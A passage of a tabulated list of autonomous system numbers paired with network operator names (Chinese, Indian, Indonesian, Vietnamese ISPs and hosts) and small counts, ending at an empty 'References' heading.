AS24428|Beijing_Founder_Broadband_Network_Technology_Co.,Ltd 1  
AS24246|Internap_Network_Services 1  
AS24204|Satnetcom_Balikpapan_PT. 1  
AS23748|Cat_Networks_K.K. 1  
AS22552|eSited_Solutions 1  
AS21859|Zenlayer_Inc 1  
AS20299|Newcom_Limited 1  
AS19994|Rackspace_Hosting 1  
AS197071|Dennis_Rainer_Warnholz_trading_as_active-servers.com 1  
AS19429|Colombia 1  
AS18209|Atria_Convergence_Technologies_pvt_ltd 1  
AS18101|Reliance_Communications_Ltd.DAKC_MUMBAI 1  
AS17971|TM-VADS_DC_Hosting 1  
AS17968|Daqing_zhongji_petroleum_telecommunication_construction_limited_cpmpany 1  
AS17897|asn_for_Heilongjiang_Provincial_Net_of_CT 1  
AS17885|PT_Excelcomindo_Pratama 1  
AS17877|NexG_Co.,_LTD 1  
AS17775|shanghai_science_and_technology_network_communication_limited_company 1  
AS17762|Tata_Teleservices_Maharashtra_Ltd 1  
AS17623|China_Unicom_Shenzen_network 1  
AS17557|Pakistan_Telecommunication_Company_Limited 1  
AS17501|WorldLink_Communications_Pvt_Ltd 1  
AS16345|Public_Joint_Stock_Company_Vimpel-Communications 1  
AS138089|PT.Global_Media_Data_Prima 1  
AS138080|PT_Global_Media_Inti_Semesta 1  
AS138062|PT._Awan_Kilat_Semesta 1  
AS137547|Zhengzhou_Lulinke_Information_Technology_CO.Ltd. 1  
AS137539|China_Unicom 1  
AS137185|HK_GALAXY_TELECOM_HOLDING_CO.,LIMITED 1  
AS137098|Delix_Net_Solution_Pvt._Ltd 1  
AS136970|YISU_CLOUD_LTD 1  
AS136958|China_Unicom_Guangdong_IP_network 1  
AS136782|Kirin_Networks 1  
AS136561|KS_Network_Ltd 1  
AS135905|VIETNAM_POSTS_AND_TELECOMMUNICATIONS_GROUP 1  
AS135636|Rackh_Lintas_Asia,_pt 1  
AS135357|Shenzhen_Katherine_Heng_Technology_Information_Co.,_Ltd. 1  
AS135100|Maxnet_Online_Limited 1  
AS134858|iForce_Networks 1  
AS134835|Starry_Network_Limited 1  
AS134810|China_Mobile_Group_JiLin_communications_corporation 1  
AS134774|CHINANET_Guangdong_province_Shenzhen_MAN_network 1  
AS134766|CHINANET_Sichuan_province_Chengdu_MAN_network 1  
AS134761|CHINANET_Sichuan_province_Chengdu_MAN_network 1  
AS134756|CHINANET_Nanjing_IDC_network 1  
AS134553|i-Skill_Dynamics_Sdn_Bhd 1  
AS134520|GigsGigs_Network_Services 1  
AS134285|Andhra_Bank 1  
AS134238|CHINANET_Jiangx_province_IDC_network 1  
AS134088|NGN_Connection_Sdn._Bhd. 1  
AS134078|NETPLUZ_HOLDINGS_PRIVATE_LIMITED 1  
AS133847|Anpple_Tech_Enterprise 1  
AS133779|Huayun_Data_International_Limited 1  
AS133776|Quanzhou 1  
AS133731|Xinyuan_Interconnect_(HK)_Limited 1  
AS133525|Nimbus2_Pty_Ltd 1  
AS133453|Mogul_Service_and_Support_LLC 1  
AS133398|Tele_Asia_Limited 1  
AS133364|Politeknik_Negeri_Jakarta 1  
AS133273|Tata_Institute_of_Social_Sciences 1  
AS133232|SAMPARK_ESTATES_PVT._LTD. 1  
AS133118|China_Unicom_IP_network 1  
AS132974|Suraj_Network 1  
AS132883|TOPWAY_GLOBAL_LIMITED 1  
AS132692|GlobiCom_Limited 1  
AS132325|LEMON_TELECOMMUNICATIONS_LIMITED 1  
AS132116|Ani_Network_Pvt_Ltd 1  
AS131755|PT_Axarva_Media_Teknologi 1  
AS131427|AOHOAVIET 1  
AS131423|Branch_of_Long_Van_System_Solution_JSC_-_Hanoi 1  
AS131353|NhanHoa_Software_company 1  
AS131324|92Cloud_Technology_Co.,_Limited 1  
AS131090|CAT_TELECOM_Public_Company_Ltd,CAT 1  
AS11343|Webhosting_Holdings_LLC 1  
AS10109|Topica_LLC,_Internet_Service_Provider,Ulaanbaatar,_Mongolia 1  
AS10105|OMNIconnect_Pty_Ltd 1  
AS10094|Telekom_Brunei_Berhad 1  
AS10045|Hanbat_National_University 1  
ASReserved; 2  
ASNone; 1  

8. 参考资料: